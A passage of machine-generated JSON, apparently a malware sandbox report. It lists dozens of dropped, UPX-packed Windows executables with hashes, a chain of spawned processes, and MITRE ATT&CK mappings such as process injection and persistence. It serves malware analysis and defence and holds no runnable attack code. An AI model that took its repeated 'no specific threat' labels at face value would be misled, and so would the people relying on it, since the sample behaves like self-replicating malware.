"description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "244640.exe (PID: 2380)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "264608.exe", "file_path": "C:\\264608.exe", "file_size": 342718, "sha256": "e3b42652884c988a4db87730b54cedcd56d9636fd8ce62dbc6a1de74ee525216", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "68804.exe (PID: 3728)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2664824.exe", "file_path": "C:\\2664824.exe", "file_size": 342579, "sha256": "1de11f9b0dcfe0088f88208aa6f2ce206eb95a82b7fe7791f3921635ca7e1f2e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2664824.exe (PID: 4516)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "402060.exe", "file_path": "C:\\402060.exe", "file_size": 343426, "sha256": "388181f49334c9af1f34aaf1d43ee33a7b5f5e210ae322a854dc946ab16a8d12", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "422022.exe (PID: 4680)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "404042.exe", "file_path": "C:\\404042.exe", "file_size": 343181, "sha256": "198580ef8907c57ba365fca724a818e2a20fdb7ae620744266bf1eff2f132731", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "frftj.exe (PID: 108)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "422022.exe", "file_path": "C:\\422022.exe", "file_size": 343409, "sha256": "6e4a5cee143f8a0266f500de83555fa2dcbb53f8e42ad637f335acc212c371d1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "422022.exe (PID: 4680)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4442828.exe", "file_path": "C:\\4442828.exe", "file_size": 342860, "sha256": "84bdb8400c9bbddf248537caea8eb39192a3dcef9ab38fd63b0d0fcc3b710692", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4442828.exe (PID: 3716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4600202.exe", "file_path": "C:\\4600202.exe", "file_size": 343052, "sha256": "7aa8f90dbae03a513465ce86c364c6c0a22ebc48e87fd767f3a93402dcec50c0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "684202.exe (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "480606.exe", "file_path": "C:\\480606.exe", "file_size": 343020, "sha256": "d4b1006c2cd99b68faf4e0233aece3ddb9d1ef3d0c5c53c82fc4d5f785e84b31", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jxtvd.exe (PID: 2028)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "606282.exe", "file_path": "C:\\606282.exe", "file_size": 343439, "sha256": "dbf9daaee38d4a24257b4ccfb76a8c9b1b19bc2b0a66da1697dc33f58fa8a699", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "606282.exe (PID: 3752)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6400262.exe", "file_path": "C:\\6400262.exe", "file_size": 343367, "sha256": "29a590f35c161c54e4ab8f9af2c34fd20c44fe0e6dbaf87d2d3cd1d74ff84986", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "njxth.exe (PID: 1712)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6602848.exe", "file_path": "C:\\6602848.exe", "file_size": 343098, "sha256": "e67c6af24ef2f96e1ce196fdeddc37913ad10283b1de3747710a028c16a35411", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6602848.exe (PID: 2736)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6644682.exe", "file_path": "C:\\6644682.exe", "file_size": 342844, "sha256": "7ed3afb189e5634f9a3d67fff0d19a4ce9fd7aafa72ffdf72315b227be26c2f9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nxxhj.exe (PID: 3776)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6662204.exe", "file_path": "C:\\6662204.exe", "file_size": 343080, "sha256": "39304044e38efa670ef5b497ec07bbb9014f7e66b64b44cc59f740170205a791", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "244640.exe (PID: 2380)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "66846.exe", "file_path": "C:\\66846.exe", "file_size": 343221, "sha256": "fab26ed2e311ce75a1a6b43bbc7cab2193c0407524ded7cbf58b0bb7b128f073", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "66846.exe (PID: 3656)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "680060.exe", "file_path": "C:\\680060.exe", "file_size": 343191, "sha256": "42b69cc33eec30f787d10a7d875bc610b13cd0c4bf8cae35dd409ba208852eb6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "680060.exe (PID: 2956)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "684202.exe", "file_path": "C:\\684202.exe", "file_size": 343040, "sha256": "634ca97c066776c58f9ab27248e25698f8a6a6a0ad4c9a5eb841fc1b16b529d9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "684202.exe (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "68804.exe", "file_path": "C:\\68804.exe", "file_size": 342701, "sha256": "adcf851c4bd51e2ef38ef4a308014fdb114c9e9b5ef0394ee4a75eb41ad2768a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "68804.exe (PID: 3728)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8284862.exe", "file_path": "C:\\8284862.exe", "file_size": 342569, "sha256": "5c13adc9c46239201f0d6df6ef7217f3ed85c5849c406b3f8d92850cc2bc83b5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8284862.exe (PID: 6080)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bnjttb.exe", "file_path": "C:\\bnjttb.exe", "file_size": 342987, "sha256": "b408f019ba5f58c784ad9f8229adee6bf8b448954908cdd006a282d4c41c0eb6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bnjttb.exe (PID: 788)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ddxvh.exe", "file_path": "C:\\ddxvh.exe", "file_size": 343327, "sha256": "23d12d43407c96cb6261f8c99c894cfc5f2df3c31817cb77e266adcdd26b4e13", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "trrfx.exe (PID: 2252)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "djblbb.exe", "file_path": "C:\\djblbb.exe", "file_size": 342959, "sha256": "a8e36b55d37c9d77b0791144646203b03592429567a60e9ad0e378b03c44e849", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "llrlf.exe (PID: 3604)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "djhdv.exe", "file_path": "C:\\djhdv.exe", "file_size": 342749, "sha256": "f2b69bf067bb419019e2e0dbec07ce5149af69480acb2e0deea31129ef1df9da", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hbxvf.exe (PID: 2108)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dptrvt.exe", "file_path": "C:\\dptrvt.exe", "file_size": 343472, "sha256": "cac8dd6b901a15c39817a84c0bc03093dd5d182930d77dbe8d567efb643a19ea", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nxthl.exe (PID: 2116)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fjprrfr.exe", "file_path": "C:\\fjprrfr.exe", "file_size": 342821, "sha256": "c37f127dae82ab78dbc7dcc5580211bd915008c10e9986632f9f2c7841006b28", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fjprrfr.exe (PID: 1820)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "frftj.exe", "file_path": "C:\\frftj.exe", "file_size": 343166, "sha256": "de7befe7e46a4500a137ff5a9481ebda96d6bc46189bc73a0f3ca1a33b85b193", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jfpjt.exe (PID: 1852)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hbxvf.exe", "file_path": "C:\\hbxvf.exe", "file_size": 342738, "sha256": "d878781552104494a8f02b8528645932ffc137381bc63e3dc09b05b5f77c4cab", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "264608.exe (PID: 4228)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hhprhp.exe", "file_path": "C:\\hhprhp.exe", "file_size": 342805, "sha256": "1f142ab74fe1c166c30dc3117019f5fb574423258901c802badf85bbf2f5a82a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hhprhp.exe (PID: 4416)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hvnjft.exe", "file_path": "C:\\hvnjft.exe", "file_size": 342542, "sha256": "88e321d1e7f5411ec37bbda19b7e1a2ed6f901d917186c19bea1c7741cf43492", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vnxhhp.exe (PID: 5936)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jfpjt.exe", "file_path": "C:\\jfpjt.exe", "file_size": 343149, "sha256": "e3df84086fdcb53eb775f6668db00e5c7fcccc86e095c57b23ab24ed47d9ec9c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jfpjt.exe (PID: 1852)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jjtpnvv.exe", "file_path": "C:\\jjtpnvv.exe", "file_size": 342897, "sha256": "ed0bb1b7065b0787ed9c8e781ee1c9e193b606c362b81260b04cbcc029a4e242", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jjtpnvv.exe (PID: 1428)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jvvbdv.exe", "file_path": "C:\\jvvbdv.exe", "file_size": 342641, "sha256": "7e6193c1bf300e8b2687f74f278404f5114ec340021e94866b295d760d4d1b53", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jvvbdv.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jxtvd.exe", "file_path": "C:\\jxtvd.exe", "file_size": 343003, "sha256": "1723de1065a2bb24814f73308d5c8149ea8b35c7859fcf45515b2900a05615c7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jxtvd.exe (PID: 2028)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ldprbfj.exe", "file_path": "C:\\ldprbfj.exe", "file_size": 343290, "sha256": "157ce600600eb869c251ce6be6d788a4546862fdecc1f0f7f84ae58f713f64f4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rndlb.exe (PID: 4256)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "llrlf.exe", "file_path": "C:\\llrlf.exe", "file_size": 342949, "sha256": "d9750186b1586b4d02e60a35084843a3227f134bd5bcd9dc756cbbd7fa4322a4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "llrlf.exe (PID: 3604)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ltnxl.exe", "file_path": "C:\\ltnxl.exe", "file_size": 342613, "sha256": "d124e1b6e0fddf3c1500ce6652ef9a53ed6f0281a11bd936ad5e39bf4d66133f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ltnxl.exe (PID: 6140)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lxpbndn.exe", "file_path": "C:\\lxpbndn.exe", "file_size": 342557, "sha256": "6b6b25d5f2e6694f7ae892c40ceb26ce2610d637ffbd524590bd0d8f76e5382e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hvnjft.exe (PID: 5952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ndnvnh.exe", "file_path": "C:\\ndnvnh.exe", "file_size": 342779, "sha256": "f033cd9321bb54683922f33c4a8e4175cac3b311db6ebad20eeb1672fd3d6701", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vvlhl.exe (PID: 4548)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nhxhrtb.exe", "file_path": "C:\\nhxhrtb.exe", "file_size": 342789, "sha256": "ca7416c1ddbda9ac7e399569772bc382749172de3d313d3a4e0262b015d375ac", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nhxhrtb.exe (PID: 3364)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "njxth.exe", "file_path": "C:\\njxth.exe", "file_size": 343355, "sha256": "906577f779a7ee28fbb571a3f423faf0279e138a4b4e37173fa66cbfcbe81281", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rhnnvfl.exe (PID: 1192)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nnpjtv.exe", "file_path": "C:\\nnpjtv.exe", "file_size": 342657, "sha256": "e0e258afc21886bbf09712508fc6122cb99d091ec56457e39042487258a74939", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jvvbdv.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nxdndh.exe", "file_path": "C:\\nxdndh.exe", "file_size": 343252, "sha256": "c69f126d75711cfe7f38da3791b36d73ad34ccf5a177677a4c5d345fbb310c96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nxdndh.exe (PID: 3096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nxthl.exe", "file_path": "C:\\nxthl.exe", "file_size": 343453, "sha256": "0f65bb3f69dd89f197112ab8f004fc6cb46341d351a44d71c13da0eebf38ffc6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nxthl.exe (PID: 2116)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nxxhj.exe", "file_path": "C:\\nxxhj.exe", "file_size": 342834, "sha256": "cf23c13b44a45af9bc8f3b48405d27743c9be7cc4d7544ef25b62208ed63fb6d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fjprrfr.exe (PID: 1820)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pfxjb.exe", "file_path": "C:\\pfxjb.exe", "file_size": 343134, "sha256": "b66770586fe81f270031a86fcc803cac72cfc856a55e56cd3af66d4bf19c58a7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "06460.exe (PID: 2952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "phlthhl.exe", "file_path": "C:\\phlthhl.exe", "file_size": 342971, "sha256": "c74562241ce10c923857768d9a59e6ecc90e153ed7e3b4fe4dc45e01bcc8e2b0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "djblbb.exe (PID: 4432)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rbndhnn.exe", "file_path": "C:\\rbndhnn.exe", "file_size": 342598, "sha256": "8d16cef1ffd8c0a54956a92917c55babf2b6428caa0a66e73f95ec8781c6407e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rbndhnn.exe (PID: 6132)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rbpjdh.exe", "file_path": "C:\\rbpjdh.exe", "file_size": 342672, "sha256": "101737d3ec27e0c63842fd966b274435cd79372c0d4b8507883cc2e51c6bcee7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rbpjdh.exe (PID: 3712)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rhnnvfl.exe", "file_path": "C:\\rhnnvfl.exe", "file_size": 343343, "sha256": "5febab3682fd82b9c3b49dcf5f8d329a1810ff71158302fc24739dbc7522f84d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rhnnvfl.exe (PID: 1192)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rllbfv.exe", "file_path": "C:\\rllbfv.exe", "file_size": 342625, "sha256": "927d3246b6426905820c4c8c9ebbc54c46534faeafb203a0a00486685de92c09", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ltnxl.exe (PID: 6140)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rndlb.exe", "file_path": "C:\\rndlb.exe", "file_size": 343272, "sha256": "1ee506d64cffc60b432cd1e7461d6ad04d3ed9a04d2297aff70f7aa52c29558c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nxdndh.exe (PID: 3096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "trrfx.exe", "file_path": "C:\\trrfx.exe", "file_size": 343307, "sha256": "a19e13e32c5d540dc91cbb0f4ec4acea8394053440677723be9a009e9b9dce76", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "trrfx.exe (PID: 2252)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vfvxb.exe", "file_path": "C:\\vfvxb.exe", "file_size": 342917, "sha256": "5b2f4c45f79236bd22d05a309088cb03e217eb8d8ab6b1c884a77c1d21929daa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jjtpnvv.exe (PID: 1428)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vnxhhp.exe", "file_path": "C:\\vnxhhp.exe", "file_size": 342525, "sha256": "f64f650b676bca21f960d5fe2936378acfb71bcaffb711b085c62495266a34b6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vnxhhp.exe (PID: 5936)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vnxlf.exe", "file_path": "C:\\vnxlf.exe", "file_size": 342682, "sha256": "e27d760880cb359e2cca70eae093b23d6e79a9f8b52160c81e03afbb66d51c69", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rbpjdh.exe (PID: 3712)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vtrrrtd.exe", "file_path": "C:\\vtrrrtd.exe", "file_size": 342934, "sha256": "52fe256d843c087c4e2ed36d8f6ef77d66774b072a54d6d42ec69e5c8c7f88b2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vfvxb.exe (PID: 1080)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vvlhl.exe", "file_path": "C:\\vvlhl.exe", "file_size": 342764, "sha256": "4e3f25320cd8702bb26e427d45e3668d923b76b89230f2ab00ca378e5bad2676", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vvlhl.exe (PID: 4548)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rhnvfjn.exe", "file_size": 343573, "sha256": "dc8140642db331e0943b8c264989f0f3aedcb505e7c8bd1267586b8423de20b8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hlrxpfj.exe", "file_size": 343560, "sha256": "731d39e69868e2a4b860df21cc59ecc0afca15e931972e5d99c2b05724e5e672", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4080482.exe", "file_size": 343547, "sha256": "e6913d84ee98e8fca560bc1f3282a009763e58e09c84e48334aaf4734e31502f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2286284.exe", "file_size": 343529, "sha256": "5c6b347c5ff25fb7f062752db883c34cd697120cedc8aa77d0ecda6b6ad1bd72", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2020002.exe", "file_size": 343518, "sha256": "fae5b76972f079cf842d79573c1deb901c760c1f206c8c674758cd7a454bb948", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "06062.exe", "file_size": 343508, "sha256": "c19125f187659a9488d456c60bbe7b3a6a440f55378099c448b0117a559199bb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8808880.exe", "file_size": 343490, "sha256": "e0788e55cec432d5c4862e8faf6c2d8aa2b240fed8386fbcf204c79c8fa4fc40", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005944", "name": "67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe", "normalized_path": "C:\\67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe", "sha256": "67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac"}, {"uid": "00000000-00005936", "parentuid": "00000000-00005944", "name": "vnxhhp.exe", "normalized_path": "c:\\vnxhhp.exe", "sha256": "f64f650b676bca21f960d5fe2936378acfb71bcaffb711b085c62495266a34b6"}, {"uid": "00000000-00005952", "parentuid": "00000000-00005936", "name": "hvnjft.exe", "normalized_path": "c:\\hvnjft.exe", "sha256": "88e321d1e7f5411ec37bbda19b7e1a2ed6f901d917186c19bea1c7741cf43492"}, {"uid": "00000000-00004248", "parentuid": "00000000-00005952", "name": "lxpbndn.exe", "normalized_path": "c:\\lxpbndn.exe", "sha256": "6b6b25d5f2e6694f7ae892c40ceb26ce2610d637ffbd524590bd0d8f76e5382e"}, {"uid": "00000000-00006080", "parentuid": "00000000-00004248", "name": "8284862.exe", "normalized_path": "c:\\8284862.exe", "sha256": "5c13adc9c46239201f0d6df6ef7217f3ed85c5849c406b3f8d92850cc2bc83b5"}, {"uid": "00000000-00004516", "parentuid": "00000000-00006080", "name": "2664824.exe", "normalized_path": "c:\\2664824.exe", "sha256": "1de11f9b0dcfe0088f88208aa6f2ce206eb95a82b7fe7791f3921635ca7e1f2e"}, {"uid": "00000000-00006132", "parentuid": "00000000-00004516", "name": "rbndhnn.exe", "normalized_path": "c:\\rbndhnn.exe", "sha256": "8d16cef1ffd8c0a54956a92917c55babf2b6428caa0a66e73f95ec8781c6407e"}, {"uid": "00000000-00006140", "parentuid": "00000000-00006132", "name": "ltnxl.exe", "normalized_path": "c:\\ltnxl.exe", "sha256": "d124e1b6e0fddf3c1500ce6652ef9a53ed6f0281a11bd936ad5e39bf4d66133f"}, {"uid": "00000000-00005416", "parentuid": "00000000-00006140", "name": "rllbfv.exe", "normalized_path": "c:\\rllbfv.exe", "sha256": "927d3246b6426905820c4c8c9ebbc54c46534faeafb203a0a00486685de92c09"}, {"uid": "00000000-00006096", "parentuid": "00000000-00005416", "name": "jvvbdv.exe", "normalized_path": "c:\\jvvbdv.exe", "sha256": "7e6193c1bf300e8b2687f74f278404f5114ec340021e94866b295d760d4d1b53"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 10}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 